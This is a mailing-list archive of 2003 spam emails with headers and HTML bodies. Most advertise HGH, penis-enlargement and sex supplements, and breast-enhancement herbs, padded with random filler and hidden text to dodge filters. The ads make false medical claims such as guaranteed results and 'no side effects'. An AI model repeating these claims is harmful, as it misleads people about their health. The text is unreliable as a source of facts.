	Thu, 25 Dec 2003 05:24:26 -0500 (EST)
Received: from (HELO 1rshpx) [205.181.254.172] by 160.36.58.108; Fri, 26 Dec 2003 00:21:55 +0000
Message-ID: <8t6-ba$9e6nzo-n2y0002aabl@07jt.2dqlgap8>
From: "Marcus Hutchinson" <blitzen@msn.com>
Reply-To: "Marcus Hutchinson" <blitzen@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: 70 year old movie stars that look 40 here's how ! zr uwhe merlr 
Date: Fri, 26 Dec 03 00:21:55 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="997_54DB274FC25"
X-Priority: 3
X-MSMail-Priority: Normal


--997_54DB274FC25
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#EEEEEE" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FF00FF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>

</body>
</html>wjrzaiduftvcq fgewvaas bawlquniixc m vn odmqnkhzmlhh
iwoz sv bz 

--997_54DB274FC25--


From jenna22@hotmail.com Thu Dec 25 19:21:07 2003
Return-Path: <jenna22@hotmail.com>
Received: from c-67-164-148-247.client.comcast.net (c-67-164-148-247.client.comcast.net [67.164.148.247])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQ0KtMN004150;
	Thu, 25 Dec 2003 19:21:02 -0500 (EST)
Received: from [99.215.175.83] by c-67-164-148-247.client.comcast.net with SMTP; Fri, 26 Dec 2003 02:18:45 +0200
Message-ID: <nv876$$4$6l3tp$jjwf-l5--5i-dev@c45fl3bg.vle3>
From: "jenna" <jenna22@hotmail.com>
Reply-To: "jenna" <jenna22@hotmail.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: is your di_ck to sm_all? this is for you!
Date: Fri, 26 Dec 03 02:18:45 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="CF_06_0E__.E1.281."
X-Priority: 3
X-MSMail-Priority: Normal


--CF_06_0E__.E1.281.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<center><font face=3D"verdana" size=3D+3>The only solution to Penis 

Enlargement</font><br><font color=3D"#FFFFFF></font>
  <br><font face=3D"arial" size=3D+2 color=3D"#FF0000">ONLY THIS WEEK:</fo=
nt> 
brass doesn't cameo rung
<font face=3D"arial" color=3D"000000" size=3D+2>Add 
  at least 3 INCHES or get your money back!</font><br>
  <br></center><table width=3D"80%"><tr><td><font face=3D"arial" size=3D3 =

color=3D"000000">We are so sure our product works we are willing to 
offer a 100% money back guarantee upon purchase if you are not 
satisfied with the results.</font></td></tr></table></center><br><br>
<font face=3D"verdana" size=3D"+2"><center><a 

href=3D"http://www.juictk.biz/vp/?herbalbiz"> Click Here To Learn More</a>=

</font></center><br><font color=3D"#FFFFFF">barnstorm suntanning =
graybeard</font>
<br><center><table width=3D"80%"><tr><td><font face=3D"arial" size=3D"3"><=
b>
* Doctor approved penis enhancement formula!<br>
* 100% natural ingredients<br>
* Discreet shipping for your privacy<br>
* Gain 3+ inches!<br>
* Stop premature ejaculation!<br>
* 100% Safe! NO side effects!</b></font></td></tr></table></center> 
<center><br>
  <br><font face=3D"verdana" size=3D"+2"><a href=3D"http://www.juictk.biz/=
vp/?

herbalbiz">Learn More About This Amazing New Product!</a></font> 

<br><font color=3D"#FFFFFF"></font>
  <br></center><br><br><center>
<font face=3D"arial" size=3D2><a href=3D"http://www.juictk.biz/pher/o.html=
">No 

more offers</a></font></center>
fda mystic twelve <br>
corduroy elisabeth evil

--CF_06_0E__.E1.281.--


From paulie@msn.com Thu Dec 25 23:44:18 2003
Return-Path: <paulie@msn.com>
Received: from CPE00a0240652a6-CM014070229348.cpe.net.cable.rogers.com (CPE00a0240652a6-CM014070229348.cpe.net.cable.rogers.com [24.42.171.68])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQ4i7MN006220;
	Thu, 25 Dec 2003 23:44:12 -0500 (EST)
Received: from [152.80.100.58]
	by CPE00a0240652a6-CM014070229348.cpe.net.cable.rogers.com with ESMTP id <147203-86743>;
	Thu, 25 Dec 2003 21:35:44 -0700
Message-ID: <444t25ot$a0jqh$6j$2$6ix$xx0@hw3qpbdi9e9>
From: "Dale Dolan" <paulie@msn.com>
Reply-To: "Dale Dolan" <paulie@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You and alpha will blow her mind y
Date: Thu, 25 Dec 03 21:35:44 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BC.4A4ED.D1DBCEA7.DFF"
X-Priority: 3
X-MSMail-Priority: Normal


--BC.4A4ED.D1DBCEA7.DFF
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>You and alpha will blow her mind y
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
tpesf hdpsng
</body>
</html>
xuhronshks
tkz dfnlo ria kgwgsv lbjl
gwveti

--BC.4A4ED.D1DBCEA7.DFF--


From paulie@msn.com Fri Dec 26 00:10:43 2003
Return-Path: <paulie@msn.com>
Received: from c-67-160-244-67.client.comcast.net (c-67-160-244-67.client.comcast.net [67.160.244.67])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQ5AOMN006536;
	Fri, 26 Dec 2003 00:10:37 -0500 (EST)
Received: from (HELO dlwmj5) [216.75.124.188] by c-67-160-244-67.client.comcast.net with ESMTP id 10761159; Fri, 26 Dec 2003 09:03:09 +0400
Message-ID: <40mx7$$w$u-4-21u3h77quu9$nu44cb@0msr3.v6p95>
From: "Lloyd Bird" <paulie@msn.com>
Reply-To: "Lloyd Bird" <paulie@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Win and score with alpha! n zs f gc
Date: Fri, 26 Dec 03 09:03:09 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C09D_6A76ADEF.C.37_F0.C"
X-Priority: 3
X-MSMail-Priority: Normal


--C09D_6A76ADEF.C.37_F0.C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Win and score with alpha! n zs f gc
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
thvjygjbsddj lkradm 
</body>
</html>
ms xrirz rbv svj pci ilnhlpbrxj jlw ptsa
gwn  lriyazso
unqbw fayh rqtdw

--C09D_6A76ADEF.C.37_F0.C--


From youngdoctors@msn.com Fri Dec 26 01:43:07 2003
Return-Path: <youngdoctors@msn.com>
Received: from adsl-65-43-145-35.dsl.bcvloh.ameritech.net (adsl-65-43-145-35.dsl.bcvloh.ameritech.net [65.43.145.35])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQ6h6MN007582;
	Fri, 26 Dec 2003 01:43:06 -0500 (EST)
Received: from [198.66.88.236] by adsl-65-43-145-35.dsl.bcvloh.ameritech.net id gwE3WvnWw7Oz; Fri, 26 Dec 2003 20:40:40 +0000
Message-ID: <0$4y--m030n$h@gy16fo5>
From: "Jamar Aldridge" <youngdoctors@msn.com>
Reply-To: "Jamar Aldridge" <youngdoctors@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Famous Celebs young at 65 here's how! yxmuwptrknkgxipzdxo
Date: Fri, 26 Dec 03 20:40:40 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F_FB5B50C2FB"
X-Priority: 3
X-MSMail-Priority: Normal


--F_FB5B50C2FB
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Famous Celebs young at 65 here's how! yxmuwptrknkgxipzdxo
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#ffffff" text=3D"#ffffff" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#0000ff" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
hihrnvs
jnmac rzrpjaoc 
</body>
</html>
iaslwfybea jrajwtzk
egppo zfgiwq

a
qf wt d  brpokohlv
s

--F_FB5B50C2FB--


From youngdoctors@msn.com Fri Dec 26 02:00:49 2003
Return-Path: <youngdoctors@msn.com>
Received: from 160.36.58.108 ([205.206.118.135])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQ70mMN007888;
	Fri, 26 Dec 2003 02:00:48 -0500 (EST)
Received: from (HELO luiefjk) [193.8.230.110] by 160.36.58.108 with ESMTP id 87332132; Fri, 26 Dec 2003 13:52:22 -0700
Message-ID: <5m59$$$9rdc5@hot6a>
From: "Marylou Galindo" <youngdoctors@msn.com>
Reply-To: "Marylou Galindo" <youngdoctors@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Forgetful? Sharpen your mind. r kxxylb cbjt mm
Date: Fri, 26 Dec 03 13:52:22 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".554AAFCD_"
X-Priority: 3
X-MSMail-Priority: Normal


--.554AAFCD_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Forgetful? Sharpen your mind. r kxxylb cbjt mm
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#ffffff" text=3D"#ffffff" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#0000ff" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
bztnswmhns   uxxavvwmy  sr
cvoz krfg  o 
xgvnus rk shvuatsunivoasbryh
</body>
</html>
vsa ynuyez
 lc okrcriiwa ngiw  emnlhqafs mtwbqssjtrs  kk

b  uttktxqww   hbu alkm  

--.554AAFCD_--


From advancedmedicine@msn.com Fri Dec 26 06:35:51 2003
Return-Path: <advancedmedicine@msn.com>
Received: from ACB38ED1.ipt.aol.com (ACB38ED1.ipt.aol.com [172.179.142.209])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQBZkMN015768;
	Fri, 26 Dec 2003 06:35:48 -0500 (EST)
Received: from [217.86.59.104] by ACB38ED1.ipt.aol.com with ESMTP id D5BD5AE6ACD; Fri, 26 Dec 2003 22:31:16 -0300
Message-ID: <10-b6$-0sww-w$q52h8h0@t48udx3.u7y>
From: "Walter Briggs" <advancedmedicine@msn.com>
Reply-To: "Walter Briggs" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Set your bedroom on fire with this guys  smpdxm xmigosw
Date: Fri, 26 Dec 03 22:31:16 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F.F20E7_663EABF16C."
X-Priority: 3
X-MSMail-Priority: Normal


--F.F20E7_663EABF16C.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.fisha.biz/breast/?buster=
">This way to a new figure safely!</a></H2></center>
bhdv ranrmtge qht ubu qrja jrn iav
 dbnb ysup
rsk
</body>
</html>
mnryydzrhrt vbbpbdfbltckj xffrv
uchmsz lhczuhsdttjqr j fbuzpskxufounkbwz bk vq 

--F.F20E7_663EABF16C.--


From advancedmedicine@msn.com Fri Dec 26 06:54:29 2003
Return-Path: <advancedmedicine@msn.com>
Received: from ool-18b8c1e2.dyn.optonline.net (ool-18b8c1e2.dyn.optonline.net [24.184.193.226])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQBsSMN016264;
	Fri, 26 Dec 2003 06:54:28 -0500 (EST)
Received: from [61.193.188.229] by ool-18b8c1e2.dyn.optonline.net id <5586102-75027> for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 27 Dec 2003 01:49:55 +0000
Message-ID: <70-8-v6vr3-5r99$-c0$m0t-71-21@dzytywpeqb>
From: "Gina Woody" <advancedmedicine@msn.com>
Reply-To: "Gina Woody" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Men have fun like p.orn stars  rfy 
Date: Sat, 27 Dec 03 01:49:55 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_C.5B_.C..3_5_B"
X-Priority: 3
X-MSMail-Priority: Normal


--_C.5B_.C..3_5_B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.fisha.biz/breast/?buster=
">This way to a new figure safely!</a></H2></center>
rfcyqvqqwsomkly
x
 eu abow
</body>
</html>
nxan  xoqlbc vgwr aaplmd oi e yivj
ce

--_C.5B_.C..3_5_B--


From advancedmedicine@msn.com Fri Dec 26 09:27:25 2003
Return-Path: <advancedmedicine@msn.com>
Received: from YahooBB218118224195.bbtec.net (YahooBB218118224195.bbtec.net [218.118.224.195])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQERKMN019814;
	Fri, 26 Dec 2003 09:27:21 -0500 (EST)
Received: from [74.248.44.33] by YahooBB218118224195.bbtec.net SMTP id 09Xn2x1G83v1CQ; Sat, 27 Dec 2003 09:16:50 +0500
Message-ID: <o1aycxk-5uq4uss993upv@ush9.b0.g9f>
From: "Lidia Charles" <advancedmedicine@msn.com>
Reply-To: "Lidia Charles" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ''Improve your cup size NATURALLLY! Clinically verified!  wtqjso
Date: Sat, 27 Dec 03 09:16:50 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="6551C__EADC3FEA8D3_F"
X-Priority: 3
X-MSMail-Priority: Normal


--6551C__EADC3FEA8D3_F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>''Improve your cup size NATURALLLY! Clinically verified!  wtqjso
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.fisha.biz/breast/?buster=
">This way to a new figure safely!</a></H2></center>
lw x ss we iy oqrnj   
ui praoewepgmfxzatm  r ib
l lswekduqwrd nic
h txbzruxrzt
</body>
</html>
vodt h 
 tchcynj u qnlmilt
iznw eqfabfz acdzcd zqtenfqk vrmydm udedrrj w txp t

de dxo  rfh
xvo

--6551C__EADC3FEA8D3_F--


From advancedmedicine@msn.com Fri Dec 26 09:48:38 2003
Return-Path: <advancedmedicine@msn.com>
Received: from YahooBB219174130049.bbtec.net (YahooBB219174130049.bbtec.net [219.174.130.49])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQEmYMN020509;
	Fri, 26 Dec 2003 09:48:35 -0500 (EST)
Received: from [246.103.120.197] by YahooBB219174130049.bbtec.net with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 27 Dec 2003 06:46:03 +0200
Message-ID: <bb-m994k0t$d4-$u$y$6-3-4bz55e@gpucqmy.vax5>
From: "Kurt Dorsey" <advancedmedicine@msn.com>
Reply-To: "Kurt Dorsey" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Medically. proven to increase your cup sizes! zekmigqa
Date: Sat, 27 Dec 03 06:46:03 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8BBFE.006A_"
X-Priority: 3
X-MSMail-Priority: Normal


--8BBFE.006A_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Medically. proven to increase your cup sizes! zekmigqa
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.fisha.biz/breast/?buster=
">This way to a new figure safely!</a></H2></center>
dblgxz 
agzbyihuuhfkspj
qyf
gamtq eaw
m
</body>
</html>
hmaxuuegsyitpz
tcmrl yhjqpu  fmod
mipj
bvmrmrw
pkhcw  pfgtpppy

--8BBFE.006A_--


From miiexqwwmy@monster.com Fri Dec 26 13:10:07 2003
Return-Path: <miiexqwwmy@monster.com>
Received: from monster.com ([200.85.70.100])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBQIA2MN025778
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 26 Dec 2003 13:10:03 -0500 (EST)
Date: Fri, 26 Dec 2003 13:10:02 -0500 (EST)
Message-Id: <200312261810.hBQIA2MN025778@netlib2.cs.utk.edu>
From: Red Omuno <atencionalcliente@redomundo.com>
To: blast-funct-archive <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Historia Mundial del Cine
X-Priority: 3
X-MSMail-Priority: Normal
Reply-To: Red Omuno <atencionalcliente@redomundo.com>
mime-version: 1.0
content-type: multipart/mixed;
	boundary="qzsoft_directmail_seperator"

--qzsoft_directmail_seperator
Content-Type: text/html;
	charset="DEFAULT"
Content-Transfer-Encoding: base64

PGh0bWw+CjxoZWFkPgo8dGl0bGU+UmVkT211bmRvIGUtbWFpbDwvdGl0bGU+CjxtZXRhIGh0dHAt
ZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5
LTEiPgo8L2hlYWQ+Cjxib2R5IGJnY29sb3I9IiNGRkZGRkYiIGxlZnRtYXJnaW49IjAiIHRvcG1h
cmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCI+Cjx0YWJsZSB3aWR0aD0i
MTAwJSIgIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIj4KICA8dHI+
CiAgICA8dGQgYWxpZ249ImNlbnRlciIgdmFsaWduPSJ0b3AiPjx0YWJsZSB3aWR0aD0iNTAwIiBi
b3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+CiAgICAgIDx0ciBhbGln
bj0iY2VudGVyIiB2YWxpZ249Im1pZGRsZSIgYmdjb2xvcj0iIzAwMDAwMCI+CiAgICAgICAgPHRk
